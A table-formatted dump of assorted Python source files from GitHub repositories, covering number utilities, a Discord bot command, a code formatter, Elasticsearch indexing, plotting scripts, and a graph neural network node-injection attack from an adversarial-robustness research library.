max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
src/common/special_numbers.py | FranzDiebold/project-euler-solutions | 1 | 12761451 | """
Special numbers utility functions.
"""
# pylint: disable=invalid-name
import math
def get_triangle_number(n: int) -> int:
    """Return the `n`-th triangle number, i.e. the sum `1+2+...+n = n(n+1)/2`."""
    return n * (n + 1) // 2
def is_triangle_number(number: int) -> bool:
    """Check if a given number `number` is a triangle number of the form 1/2 * n * (n+1).

    `number` is triangular iff `8*number + 1` is a perfect square. Uses exact
    integer arithmetic (`math.isqrt`) instead of floating-point `math.sqrt`,
    so the test stays correct for arbitrarily large integers, where the float
    version loses precision.
    """
    discriminant = 8 * number + 1
    root = math.isqrt(discriminant)  # raises ValueError for negative input, like math.sqrt
    return root * root == discriminant
def get_square_number(n: int) -> int:
    """Return the `n`-th square number, `S_n = n^2`."""
    return n ** 2
def get_pentagonal_number(n: int) -> int:
    """Return the `n`-th pentagonal number, `P_n = (3n^2 - n) / 2`."""
    return (3 * n * n - n) // 2
def is_pentagonal_number(number: int) -> bool:
    """Check if a given number `number` is a pentagonal number of the form n * (3*n − 1) / 2.

    `number` is pentagonal iff `24*number + 1` is a perfect square whose root
    `r` satisfies `(r + 1) % 6 == 0` (then `n = (r + 1) / 6`). Exact integer
    arithmetic (`math.isqrt`) avoids float-precision failures for large inputs.
    """
    discriminant = 24 * number + 1
    root = math.isqrt(discriminant)
    return root * root == discriminant and (root + 1) % 6 == 0
def get_hexagonal_number(n: int) -> int:
    """Return the `n`-th hexagonal number, `H_n = 2n^2 - n`."""
    return 2 * n * n - n
def is_hexagonal_number(number: int) -> bool:
    """Check if a given number `number` is a hexagonal number of the form n * (2*n − 1).

    `number` is hexagonal iff `8*number + 1` is a perfect square whose root
    `r` satisfies `(r + 1) % 4 == 0` (then `n = (r + 1) / 4`, since
    `8*H_n + 1 = (4n - 1)^2`). Exact integer arithmetic (`math.isqrt`)
    avoids float-precision failures for large inputs.
    """
    discriminant = 8 * number + 1
    root = math.isqrt(discriminant)
    return root * root == discriminant and (root + 1) % 4 == 0
def get_heptagonal_number(n: int) -> int:
    """Return the `n`-th heptagonal number, `H_n = (5n^2 - 3n) / 2`."""
    return (5 * n * n - 3 * n) // 2
def get_octagonal_number(n: int) -> int:
    """Return the `n`-th octagonal number, `O_n = 3n^2 - 2n`."""
    return 3 * n * n - 2 * n
| 4.21875 | 4 |
modules/about.py | LFGSaito/OwlBotFAU | 0 | 12761452 | <reponame>LFGSaito/OwlBotFAU
from client import client
import datetime
import discord
import key

# Name used as the command trigger and as the key in the help registry.
cmd_name = "about"

# Register the one-line summary shown in the bot's basic help listing.
client.basic_help(title=cmd_name, desc=f"returns information about {client.bot_name}")

detailed_help = {
    "Usage": f"{client.default_prefix}{cmd_name}",
    "Description": "Shows information about the bot.",
    # NO Aliases field, this will be added automatically!
}
# Register the detailed per-command help mapping.
client.long_help(cmd=cmd_name, mapping=detailed_help)
@client.command(trigger=cmd_name)  # aliases is a list of strs of other triggers for the command
async def handle(command: str, message: discord.Message):
    """Build an embed describing the bot and send it to the invoking channel."""
    embed = discord.Embed(title=f"{client.bot_name} info", description=discord.Embed.Empty, color=0x404040)
    info_fields = [
        ("Version", f"Framework version {client.__version__}\nBot version 0.8"),
        ("Creator", key.creator),
        ("Github", key.github_info),
        ("Built with", key.built_with),
        ("Invite Link", key.invite_url),
    ]
    for field_name, field_value in info_fields:
        embed = embed.add_field(name=field_name, value=field_value)
    embed = embed.set_footer(text=str(datetime.datetime.utcnow()))
    await message.channel.send(embed=embed)
    return
| 2.453125 | 2 |
test_SERVER.py | eelviral/RTC-Data-Streaming | 0 | 12761453 | <filename>test_SERVER.py<gh_stars>0
import unittest
import server
class TestServer(unittest.TestCase):
    """Placeholder test suite for the server module."""

    def test_foo(self):
        # TODO: replace this placeholder with real assertions against `server`.
        pass

if __name__ == '__main__':
    unittest.main()
dist_deps.py | hboutemy/angular9-example-app-1 | 0 | 12761454 | # Author: <NAME>
# Angular Distribution Dependency Parser
# This is a python script that is placed into an Angular project directory and is run to obtain a list
# of unique npmjs package directories. It parsed the vendor source map header that contains the paths
# to all the files that are pulled in from the node_modules directory by the embedded Angular webpack.
import glob, os

# Locate a source map inside ./dist: prefer the vendor map, fall back to the
# main map, and abort if neither exists.
try:
    path = glob.glob('./dist/*/vendor.*.map')[0]
except IndexError:
    print('Vendor source map not found, using main source map.')
    try:
        path = glob.glob('./dist/*/main.*.map')[0]
    except IndexError:
        print('No valid source map found.')
        quit()

# Read the whole source map, stripping newlines so the header is one string.
with open(path, 'r') as f:
    vendor_paths = f.read().replace('\n', '')

# chops off the end of the source map header with the vendor directories
vendor_paths = vendor_paths.split(']')[0]
# chops off the opener to give all the paths delimited by commas
vendor_paths = vendor_paths.split('[')[1]
# splits by commas
vendor_paths = vendor_paths.split(',')

package_dirs = set()
for path in vendor_paths:
    # Strip a fixed 12-character prefix and the trailing quote to get a path
    # relative to node_modules — presumably the webpack:/// wrapper; verify
    # against the source-map format if paths look wrong.
    path = path[12:-1]
    print(path)
    # running ng build with the --build-optimizer flag appends this suffix in the source map
    if path.endswith('.pre-build-optimizer.js'):
        path = path.replace('.pre-build-optimizer.js', '')
    # checks if the file actually exists
    if not os.path.isfile(path):
        print('The following file was not found: ', path)
        continue
    # Walk up from the file's directory until we hit ./node_modules.
    parent_dir = os.path.dirname(path)
    while parent_dir != './node_modules':
        # Guard against an infinite loop for paths outside node_modules.
        if parent_dir == '.' or parent_dir == '':
            print('The following path is not in a node_modules directory: ', path)
            break
        # The first ancestor holding a package.json is the package root.
        if os.path.isfile(parent_dir + '/package.json'):
            package_dirs.add(parent_dir)
            break
        parent_dir = os.path.dirname(parent_dir)
    else:
        # Loop ended without break: reached node_modules with no package.json found.
        print('No package.json file was found anywhere in the following path: ', path)

# Write the unique package directories for the IQ server CLI. The context
# manager guarantees the output file is flushed and closed (the original
# left the handle open on early exit paths).
print('This is the set of unique package directories for files defined in the vendor source map: ')
with open('package_dirs.txt', 'w+') as out_file:
    for package_path in package_dirs:
        out_file.write(package_path + '\n')
        print(package_path)
| 2.40625 | 2 |
setup.py | Euromance/pynote | 0 | 12761455 | <filename>setup.py
import setuptools

VERSION = '0.1.6'

# Read the long description with an explicit encoding and close the handle
# promptly (the original `open(...).read()` leaked the file object and used
# the locale-dependent default encoding).
with open('README.md', encoding='utf-8') as readme_file:
    long_description = readme_file.read()

setuptools.setup(
    name='pynote',
    packages=setuptools.find_packages(),
    version=VERSION,
    description='Note taking app.',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/Euromance/pynote',
    author='Euromance',
    author_email='<EMAIL>',
    classifiers=[
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.9',
        'License :: OSI Approved :: MIT License',
    ],
    project_urls={
        'Repository': 'https://github.com/Euromance/pynote',
    },
    python_requires='>=3.9,<4',
    install_requires=[
        'confboy>=0.2.0,<1.0.0',
        'typer[all]>=0.3.0,<1.0.0',
    ],
    extras_require={
        'dev': [
            'flake8-commas==2.0.0',
            'flake8-import-order==0.18.1',
            'flake8-quotes==3.2.0',
            'flake8==3.9.1',
            'pep8-naming==0.11.1',
        ],
        'test': [
            'pytest-cov==2.11.1',
            'pytest-mock==3.5.1',
            'pytest==6.2.2',
        ],
    },
    entry_points={
        'console_scripts': [
            'note=pynote:app',
        ],
    },
)
| 1.398438 | 1 |
controller/plot_step_and_weights.py | romenr/bachelorthesis | 2 | 12761456 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import h5py
import matplotlib.pyplot as plt
from matplotlib import gridspec
from os import path
import parameters as param
import argparse
import pandas as pd
# NOTE(review): pd.stats.moments.ewma was removed in modern pandas, and the
# bare `print` statements below require Python 2 — this script depends on a
# legacy environment.
ewma = pd.stats.moments.ewma

# Configure Command Line interface
controller = dict(tf="target following controller", oa="obstacle avoidance controller")
parser = argparse.ArgumentParser(description='Plot the final weights and show it in a Window')
parser.add_argument('controller', choices=controller, default='oa', help="tf - target following, oa - obstacle avoidance")
parser.add_argument('-n', '--noShow', help='Do not show the resulting Plot in a window', action="store_true")
parser.add_argument('dir', help='Base directory of the experiment eg. ./data/session_xyz', default=param.default_dir)
args = parser.parse_args()

print "Using", controller[args.controller]

is_oa = args.controller == 'oa'
# Load left/right synaptic weights and the reward signal from the HDF5
# training file of the selected controller.
if is_oa:
    h5f = h5py.File(path.join(args.dir, param.training_file_oa), 'r')
    w = np.array(h5f['w_oa'], dtype=float)
    w_l = w[:, 0]
    w_r = w[:, 1]
    w_i = range(0, w_l.shape[0])
    dopamine = np.array(h5f['reward'], dtype=float)[:, 2]
else:
    h5f = h5py.File(path.join(args.dir, param.training_file_tf), 'r')
    w = np.array(h5f['w_tf'], dtype=float)
    w_l = w[:, 0]
    w_l = w_l.reshape(w_l.shape[0], -1)
    w_r = w[:, 1]
    w_r = w_r.reshape(w_r.shape[0], -1)
    w_i = range(0, w_l.shape[0])
    dopamine = np.array(h5f['reward'], dtype=float)[:, 0]

# Episode bookkeeping; episodes shorter than 6 steps are discarded as noise.
episode_steps = np.array(h5f["episode_steps"], dtype=int)
episode_completed = np.array(h5f['episode_completed'], dtype=bool)
episode_completed = episode_completed[episode_steps > 5]
episode_steps = episode_steps[episode_steps > 5]
#dopamine = np.array(h5f["target_pos"], dtype=float)

# Split episode indices into successes and failures for the scatter markers.
values_x = np.array(range(episode_steps.size))
success_y = episode_steps[episode_completed]
success_x = values_x[episode_completed]
failures_y = episode_steps[~episode_completed]
failures_x = values_x[~episode_completed]

# retrieve the dat
steps =episode_steps

# Plot — subplot 1: steps per episode with a mean line over long episodes.
fig= plt.subplots(figsize=(9, 14))
gs = gridspec.GridSpec(1, 1, height_ratios=[1])
ax_1 = plt.subplot(411)
xlim1 = steps.size
ylim1 = steps.max(axis=0)*1.1
plt.plot(steps, lw=2, color='darkorange')
ax_1.set_xlim((0, xlim1))
ax_1.set_ylim((0, ylim1))
ax_1.set_ylabel('Time Steps')
ax_1.set_xlabel('Episode')
plt.grid()
plt.axhline(y=np.average(steps[steps > 400]), color='green', lw=3, linestyle='--')
for item in ([ax_1.title, ax_1.xaxis.label, ax_1.yaxis.label] + ax_1.get_xticklabels() + ax_1.get_yticklabels()):
    item.set_fontsize(16)
ax_1.scatter(success_x, success_y, marker='^', color='g', s=12)
ax_1.scatter(failures_x, failures_y, marker='x', color='r', s=12)

# Subplot 2: raw dopamine reward with a forward/backward EWMA smoothing
# (averaging both directions removes the lag of a one-sided EWMA).
ax_2 = plt.subplot(412)
span_value = 20
time_step = np.arange(0, dopamine.size)
fwd = ewma(dopamine, span=span_value)
bwd = ewma(dopamine[::-1], span=span_value)
c = np.vstack((fwd, bwd[::-1]))
c = np.mean(c, axis=0)
ax_2.set_ylabel('Dopamine Reward')
# ax_2.set_xlabel('Time Steps')
plt.plot(time_step, dopamine, lw=2, color='b', alpha=0.3)
plt.plot(time_step, c, lw=1, color='b')
for item in ([ax_2.title, ax_2.xaxis.label, ax_2.yaxis.label] + ax_2.get_xticklabels() + ax_2.get_yticklabels()):
    item.set_fontsize(16)

# Subplots 3 and 4: weight trajectories to the left/right motor neurons.
xlim = w_i[-1]
ymin1 = param.w_min
ymax1 = param.w_max
ax_3 = plt.subplot(413, sharex=ax_2)
# ax_3.set_title('Weights to left neuron', color='0.4')
ax_3.set_ylabel('Weight to Left Neuron')
ax_3.set_xlim((0,xlim))
ax_3.set_ylim((ymin1, ymax1))
plt.grid(True)
ax_3.tick_params(axis='both', which='both', direction='in', bottom=True, top=True, left=True, right=True)
print w_l.shape, w_l[-1]
for i in range(w_l.shape[1]):
    plt.plot(w_i, w_l[:,i])
for item in ([ax_3.title, ax_3.xaxis.label, ax_3.yaxis.label] + ax_3.get_xticklabels() + ax_3.get_yticklabels()):
    item.set_fontsize(16)
#if is_oa:
#    ax_3.legend([u'Left 60°', u'Left 30°', u'Right 30°', u'Right 60°'])

ymin2 = param.w_min
ymax2 = param.w_max
ax_4 = plt.subplot(414, sharex=ax_3)
# ax_4.set_title('Weights to right neuron', color='0.4')
ax_4.set_ylabel('Weight to Right Neuron')
ax_4.set_xlim((0,xlim))
ax_4.set_ylim((ymin2,ymax2))
plt.grid(True)
ax_4.tick_params(axis='both', which='both', direction='in', bottom=True, top=True, left=True, right=True)
for i in range(w_r.shape[1]):
    plt.plot(w_i, w_r[:,i])
ax_4.set_xlabel('Simulation Time [1 step = 50 ms]')
for item in ([ax_4.title, ax_4.xaxis.label, ax_4.yaxis.label] + ax_4.get_xticklabels() + ax_4.get_yticklabels()):
    item.set_fontsize(16)
plt.grid(True)
plt.subplots_adjust(wspace=0., hspace=0.3, right=0.96, left=0.16, bottom=0.06, top=0.96)

# Save the figure under the experiment directory, then show it interactively.
if is_oa:
    plt.savefig(path.join(args.dir, "training_oa.pdf"), bbox_inches='tight')
else:
    plt.savefig(path.join(args.dir, "training_tf.pdf"), bbox_inches='tight')
plt.show()
| 2.4375 | 2 |
tools/formatting.py | rtthread-bot/rt-thread | 15 | 12761457 | <filename>tools/formatting.py
#
# File : formatting.py
# This file is part of RT-Thread RTOS
# COPYRIGHT (C) 2006 - 2018, RT-Thread Development Team
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Change Logs:
# Date Author Notes
# 2021-03-02 <NAME> The first version
# 2021-03-04 <NAME> 增加统一转换成UTF-8编码格式功能
#本文件会自动对指定路径下的所有文件包括子文件夹的文件(仅针对.c.h)进行扫描
# 1)将源文件编码统一为UTF-8;
# 2)将TAB键替换为空格;
# 3)将每行末尾多余的空格删除,并统一换行符为'\n';
#使用时只需要双击本文件,输入要扫描的文件夹路径即可
#不能保证100%全部成功转换为UTF-8,有一些编码特殊或识别不准确会在终端打印信息,需人工转换
#欢迎对本文件的功能继续做出补充,欢迎提交PR
import os
import chardet
#用空格代替TAB键
#这里并不是简单的将TAB替换成4个空格
#空格个数到底是多少需要计算,因为TAB制表本身有自动对齐的功能
def tab2spaces(line):
    """Expand each TAB in *line* to spaces, aligning to 4-column tab stops.

    A tab is not simply four spaces: the number of spaces inserted depends on
    the column where the tab occurs, mirroring the editor's alignment behavior.
    """
    expanded = []
    for ch in line:
        if ch == '\t':
            # Pad to the next multiple-of-4 column.
            pad = 4 - (len(expanded) % 4)
            expanded.extend(' ' * pad)
        else:
            expanded.append(ch)
    return ''.join(expanded)
#删除每行末尾多余的空格 统一使用\n作为结尾
def formattail(line):
    """Strip trailing whitespace from *line* and terminate it with a single '\\n'."""
    return line.rstrip() + '\n'
#对单个文件进行格式整理
def format_codes(filename):
    """Normalize a single UTF-8 file in place: expand tabs and trim line tails.

    Writes the reformatted content to a temporary file, then replaces the
    original. Files that fail to decode as UTF-8 are reported and skipped.
    """
    # NOTE(review): as received, this `try` had no `except` clause (a syntax
    # error); a UnicodeDecodeError handler is the minimal plausible repair.
    try:
        file = open(filename, 'r', encoding = 'utf-8')
        file_temp = open('temp', 'w', encoding = 'utf-8')
        for line in file:
            line = tab2spaces(line)
            line = formattail(line)
            file_temp.write(line)
        file_temp.close()
        file.close()
        os.remove(filename)
        os.rename('temp', filename)
    except UnicodeDecodeError:
        print('UnicodeDecodeError, manual check required: ' + filename)
def get_encode_info(file):
    """Detect the text encoding of *file*; return the codec name, or None if unsupported."""
    with open(file, 'rb') as f:
        code = chardet.detect(f.read())['encoding']
        # chardet occasionally misidentifies the encoding of this codebase;
        # patch the two common cases observed in practice.
        if code == 'EUC-JP':  # English text with a little Chinese is easily mistaken for Japanese
            code = 'GB2312'
        elif code == 'ISO-8859-1':  # some GB2312 files are reported as ISO-8859-1
            code = 'GB2312'
        # Only these encodings are handled automatically. Windows-1252 appears
        # because ST (a French company) uses French punctuation in comments.
        if not (code == 'ascii' or code == 'utf-8' or code == 'GB2312'
                or code == 'Windows-1252'):
            if code != None:
                print('未处理,需人工确认:'+code+':'+file)  # needs manual confirmation
            code = None
        return code
#将单个文件转为UTF-8编码
def conver_to_utf_8 (path):
    """Re-encode a single file to UTF-8 in place.

    Returns 1 on success, 0 on failure (unknown encoding or codec error).
    """
    try:
        info = get_encode_info(path)
        if info == None:
            return 0  # 0 means failure
        # Context manager guarantees the handle is closed even on error paths
        # (the original leaked it when decode/encode raised).
        with open(path, 'rb+') as file:
            data = file.read()
            string = data.decode(info)
            utf = string.encode('utf-8')
            file.seek(0)
            file.write(utf)
            # Bug fix: drop leftover bytes when the UTF-8 content is shorter
            # than the original; without truncate() stale tail bytes remained.
            file.truncate()
        return 1  # 1 means success
    except UnicodeDecodeError:
        print("UnicodeDecodeError未处理,需人工确认"+path)
        return 0
    except UnicodeEncodeError:
        print("UnicodeEncodeError未处理,需人工确认"+path)
        return 0
# 递归扫描目录下的所有文件
def traversalallfile(path):
    """Recursively visit every file under *path*, converting each .c/.h source
    to UTF-8 and then normalizing its formatting."""
    for entry in os.listdir(path):
        entry_path = os.path.join(path, entry)
        if os.path.isdir(entry_path):
            traversalallfile(entry_path)
        elif os.path.isfile(entry_path):
            # Only C sources and headers are processed.
            if entry_path.endswith((".c", ".h")):
                # Format only files that converted to UTF-8 successfully (returns 1).
                if conver_to_utf_8(entry_path) == 1:
                    format_codes(entry_path)
def formatfiles():
    """Prompt for a directory and normalize every .c/.h file beneath it."""
    workpath = input('enter work path: ')
    traversalallfile(workpath)

if __name__ == '__main__':
    formatfiles()
| 1.820313 | 2 |
expense_tracker/__init__.py | TClaypool00/ExpenseTrackerClient-Python | 0 | 12761458 | import pymysql
pymysql.version_info = (1,4,0, "final", 0)
pymysql.install_as_MySQLdb() | 1.46875 | 1 |
src/elasticsearch/create_doc_index.py | jhunhwang/goldenretriever | 8 | 12761459 | <reponame>jhunhwang/goldenretriever<filename>src/elasticsearch/create_doc_index.py
""""""
"""
Version:
--------
0.1 11th May 2020
Usage:
------
Script to handle indexing of QnA datasets into Elasticsearch for downstream finetuning and serving
- Define index schema using elasticsearch_dsl classes
- Connect and upload Documents to Elasticsearch
"""
from datetime import datetime
from elasticsearch_dsl import Index, Document, InnerDoc, Date, Nested, Keyword, Text, Integer, connections
from argparse import ArgumentParser
import pandas as pd
def upload_docs(qa_pairs):
    """
    adds one document per qa pair to the elastic index
    assumes that index fields correspond to the template defined under the
    __main__ guard in this file
    :param qa_pairs: list of dictionaries with key:value='ans_id':integer, 'ans_str':str, 'query_str'=str, 'query_id'=integer
    :return: None (documents and qa_pairs are indexed to Elastic as a side effect)
    """
    # NOTE(review): `Doc` is defined inside the __main__ block below, so this
    # function only works when the module is run as a script — importing it
    # elsewhere would raise NameError.
    print('uploading docs')
    counter = 0
    for pair in qa_pairs:
        # The answer text doubles as the document body; the QA pair is nested.
        first = Doc(doc=pair['ans_str'])
        first.add_qa_pair(pair['ans_id'], pair['ans_str'], pair['query_id'], pair['query_str'])
        first.save()
        counter += 1
    print("indexing finished")
    print(f'indexed {counter} documents')
if __name__ == '__main__':
    parser = ArgumentParser(description='index qa dataset to Elasticsearch')
    parser.add_argument('url', help='elasticsearch url')
    parser.add_argument('csv_file', help='csv file with qa pairs')
    parser.add_argument('index_name', help='name of index to create')
    args = parser.parse_args()

    # Single-node defaults: one shard, no replicas.
    index = Index(args.index_name)
    index.settings = {"number_of_shards": 1,
                      "number_of_replicas": 0}

    # index schema
    class QA(InnerDoc):
        # One question/answer pair; ans_str keeps a raw keyword sub-field for exact matching.
        ans_id = Integer()
        ans_str = Text(fields={'raw': Keyword()})
        query_id = Integer()
        query_str = Text()

    @index.document
    class Doc(Document):
        # Top-level document: full text plus nested QA pairs and a creation timestamp.
        doc = Text()
        created_at = Date()
        qa_pair = Nested(QA)

        def add_qa_pair(self, ans_id, ans_str, query_id, query_str):
            """Append one nested QA pair to this document."""
            self.qa_pair.append(QA(ans_id=ans_id, ans_str=ans_str, query_id=query_id, query_str=query_str))

        def save(self, **kwargs):
            """Stamp created_at at save time, then delegate to Document.save."""
            self.created_at = datetime.now()
            return super().save(**kwargs)

    # connect to ES instance and start indexing
    connections.create_connection(hosts=[args.url])
    qa_pairs = pd.read_csv(args.csv_file).fillna('nan').to_dict('records')
    # NOTE(review): upload_docs returns None, so `counter` is always None here.
    counter = upload_docs(qa_pairs)
| 2.828125 | 3 |
Basic/25_list_and_dict_comprehension/list_comprehension.py | reskimulud/Python | 1 | 12761460 | # List Comprehension
# adalah metode untuk menambahkan anggota dari suatu list melalui for loop
# Syntax dari List Comprehension adalah
# [expression for item in iterable]
# Original List
original = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print(f"Original : {original}")
# Output = Original : [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# Implementasi List Comprehension dengan Iterable
original_dua = [value for value in range(5, 11)]
print(f"Original Range : {original_dua}")
# Output = Original Range : [5, 6, 7, 8, 9, 10]
# Implementasi List Comprehension dengan Pemangkatan (Exponential)
exp_list = [item**2 for item in original]
print(f"Exponent List : {exp_list}")
# Output = Exponent List : [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
# Implementasi List Comprehension dengan If Else
genap = [item for item in original if item % 2 == 0]
print(f"Genap : {genap}")
# Output = Genap : [2, 4, 6, 8, 10]
# Implementasi List Comprehension dengan Expression
elemen = ["Api", "Air", "Tanah", "Udara"]
huruf_awal = [item[0] for item in elemen]
print(f"Huruf Awal : {huruf_awal}")
# Output = Huruf Awal : ['A', 'A', 'T', 'U']
| 4.28125 | 4 |
graphwar/attack/injection/adv_injection.py | EdisonLeeeee/GraphWar | 10 | 12761461 | from copy import copy
from typing import Optional, Union
import numpy as np
import torch
import torch.nn.functional as F
from torch import Tensor
from torch.autograd import grad
from tqdm import tqdm
from graphwar import Surrogate
from graphwar.attack.injection.injection_attacker import InjectionAttacker
class AdvInjection(InjectionAttacker, Surrogate):
    r"""2nd place solution of KDD CUP 2020
    "Adversarial attack and defense" challenge.

    Example
    -------
    >>> from graphwar.dataset import GraphWarDataset
    >>> import torch_geometric.transforms as T
    >>> dataset = GraphWarDataset(root='~/data/pygdata', name='cora',
                                  transform=T.LargestConnectedComponents())
    >>> data = dataset[0]
    >>> surrogate_model = ... # train your surrogate model
    >>> from graphwar.attack.injection import AdvInjection
    >>> attacker.setup_surrogate(surrogate_model)
    >>> attacker = AdvInjection(data)
    >>> attacker.reset()
    >>> attacker.attack(10, feat_limits=(0, 1)) # injecting 10 nodes for continuous features
    >>> attacker.reset()
    >>> attacker.attack(10, feat_budgets=10) # injecting 10 nodes for binary features
    >>> attacker.data() # get attacked graph
    >>> attacker.injected_nodes() # get injected nodes after attack
    >>> attacker.injected_edges() # get injected edges after attack
    >>> attacker.injected_feats() # get injected features after attack

    Note
    ----
    * Please remember to call :meth:`reset` before each attack.
    """

    def attack(self, num_budgets: Union[int, float], *,
               targets: Optional[Tensor] = None,
               interconnection: bool = False,
               lr: float = 0.01,
               num_edges_global: Optional[int] = None,
               num_edges_local: Optional[int] = None,
               feat_limits: Optional[Union[tuple, dict]] = None,
               feat_budgets: Optional[int] = None,
               disable: bool = False) -> "AdvInjection":
        # Base-class call validates the budgets/targets and fills in
        # self.targets, self.feat_limits, self.feat_budgets, etc.
        super().attack(num_budgets, targets=targets,
                       num_edges_global=num_edges_global,
                       num_edges_local=num_edges_local,
                       feat_limits=feat_limits,
                       feat_budgets=feat_budgets)
        candidate_nodes = self.targets.tolist()
        edge_index, edge_weight, feat = self.edge_index, self.edge_weight, self.feat

        if edge_weight is None:
            edge_weight = feat.new_ones(edge_index.size(1))

        feat_min, feat_max = self.feat_limits
        # Largest feature magnitude allowed, used to scale the sign of the gradient.
        feat_limits = max(abs(feat_min), feat_max)
        feat_budgets = self.feat_budgets

        injected_feats = None
        # Inject one node per iteration; new node ids continue after the
        # existing ones.
        for injected_node in tqdm(range(self.num_nodes, self.num_nodes+self.num_budgets),
                                  desc="Injecting nodes...",
                                  disable=disable):
            # Candidate edges: connect the new node to every candidate node.
            injected_edge_index = np.stack(
                [np.tile(injected_node, len(candidate_nodes)), candidate_nodes], axis=0)
            injected_edge_index = torch.as_tensor(
                injected_edge_index).to(edge_index)
            # Zero-weight candidate edges made differentiable so their
            # gradients rank which edges to keep.
            injected_edge_weight = edge_weight.new_zeros(
                injected_edge_index.size(1)).requires_grad_()
            injected_feat = feat.new_zeros(1, self.num_feats)

            # Grow the (differentiable) feature matrix of injected nodes.
            if injected_feats is None:
                injected_feats = injected_feat.requires_grad_()
            else:
                injected_feats = torch.cat(
                    [injected_feats, injected_feat], dim=0).requires_grad_()

            edge_grad, feat_grad = self.compute_gradients(
                feat, edge_index, edge_weight,
                injected_feats, injected_edge_index, injected_edge_weight,
                targets=self.targets, target_labels=self.target_labels)

            # Keep only the locally budgeted number of highest-gradient edges.
            topk_edges = torch.topk(edge_grad, k=self.num_edges_local).indices
            injected_edge_index = injected_edge_index[:, topk_edges]
            self.inject_node(injected_node)
            self.inject_edges(injected_edge_index)

            with torch.no_grad():
                # Commit the chosen edges (both directions) to the working graph.
                edge_index = torch.cat(
                    [edge_index, injected_edge_index, injected_edge_index.flip(0)], dim=1)
                edge_weight = torch.cat(
                    [edge_weight, edge_weight.new_ones(injected_edge_index.size(1)*2)], dim=0)

                if feat_budgets is not None:
                    # Binary features: set the top-k gradient positions to 1.
                    topk = torch.topk(
                        feat_grad, k=feat_budgets, dim=1)
                    injected_feats.data.fill_(0.)
                    injected_feats.data.scatter_(
                        1, topk.indices, 1.0)
                else:
                    # Continuous features: move to the gradient-sign extreme,
                    # clamped to the allowed range.
                    injected_feats.data = (
                        feat_limits * feat_grad.sign()).clamp(min=feat_min, max=feat_max)

            if interconnection:
                # Later injected nodes may also connect to this one.
                candidate_nodes.append(injected_node)

        self._injected_feats = injected_feats.data
        return self

    def compute_gradients(self, x, edge_index, edge_weight,
                          injected_feats, injected_edge_index,
                          injected_edge_weight,
                          targets, target_labels):
        """Return gradients of the attack loss w.r.t. the candidate edge
        weights and injected features (higher gradient = more damaging)."""
        x = torch.cat([x, injected_feats], dim=0)
        edge_index = torch.cat(
            [edge_index, injected_edge_index, injected_edge_index.flip(0)], dim=1)
        edge_weight = torch.cat(
            [edge_weight, injected_edge_weight.repeat(2)], dim=0)

        # Temperature-scaled surrogate logits on the target nodes.
        logit = self.surrogate(x, edge_index, edge_weight)[targets] / self.eps
        loss = F.cross_entropy(logit, target_labels)
        return grad(loss, [injected_edge_weight, injected_feats], create_graph=False)
| 2.25 | 2 |
tests/test_horizontal_rule.py | u8slvn/MarkdownIO | 3 | 12761462 | from markdownio import block
def test_linebreak(document):
    """A HorizontalRule block renders as a markdown thematic break."""
    rule = block.HorizontalRule()
    document.add(rule)
    assert document.output() == "---\n"
| 2.609375 | 3 |
src/translate_winogender.py | alexissavva/NLP | 31 | 12761463 | """ Usage:
<file-name> --in=IN_FILE --langs=LANGUAGES --out=OUT_FILE [--debug]
"""
# External imports
import logging
import pdb
from pprint import pprint
from pprint import pformat
from docopt import docopt
from collections import defaultdict
from operator import itemgetter
from tqdm import tqdm
# Local imports
from google_translate import google_translate
#=-----
if __name__ == "__main__":
    # Parse command line arguments
    args = docopt(__doc__)
    inp_fn = args["--in"]
    langs = args["--langs"].split(",")
    out_fn = args["--out"]
    debug = args["--debug"]
    if debug:
        logging.basicConfig(level = logging.DEBUG)
    else:
        logging.basicConfig(level = logging.INFO)

    logging.info(f"Writing output to {out_fn}")
    with open(out_fn, "w", encoding = "utf8") as fout:
        # TSV header: sentence id, English sentence, then one column per target language.
        fout.write("\t".join(["sentid", "sentence"] + langs) + "\n")
        lines = [line.strip() for line in open(inp_fn, encoding = "utf8")]
        # Skip the input header row; each data row is "sentid<TAB>sentence".
        for line in tqdm(lines[1:]):
            sentid, sent = line.strip().split("\t")
            # Translate the sentence from English into every requested language.
            trans = [google_translate([sent], "en", target_lang)[0]["translatedText"]
                     for target_lang in langs]
            fout.write("\t".join([sentid, sent] + trans) + "\n")

    logging.info("DONE")
| 2.6875 | 3 |
nwb_conversion_tools/datainterfaces/ecephys/spikeinterface/sipickledatainterfaces.py | Saksham20/nwb-conversion-tools | 0 | 12761464 | """Authors: <NAME>."""
from spikeextractors import load_extractor_from_pickle
from ..baserecordingextractorinterface import BaseRecordingExtractorInterface
from ..basesortingextractorinterface import BaseSortingExtractorInterface
from ....utils import FilePathType
class SIPickleRecordingExtractorInterface(BaseRecordingExtractorInterface):
    """Interface for SpikeInterface Recording objects persisted as .pkl files."""

    # Base class loads a RecordingExtractor class; unused here since the
    # extractor instance comes from the pickle itself.
    RX = None

    def __init__(self, file_path: FilePathType):
        """Load the pickled RecordingExtractor from *file_path*."""
        self.recording_extractor = load_extractor_from_pickle(pkl_file=file_path)
        self.subset_channels = None
        self.source_data = {"file_path": file_path}
class SIPickleSortingExtractorInterface(BaseSortingExtractorInterface):
    """Interface for SpikeInterface Sorting objects persisted as .pkl files."""

    # Base class loads a SortingExtractor class; unused here since the
    # extractor instance comes from the pickle itself.
    SX = None

    def __init__(self, file_path: FilePathType):
        """Load the pickled SortingExtractor from *file_path*."""
        self.sorting_extractor = load_extractor_from_pickle(pkl_file=file_path)
        self.source_data = {"file_path": file_path}
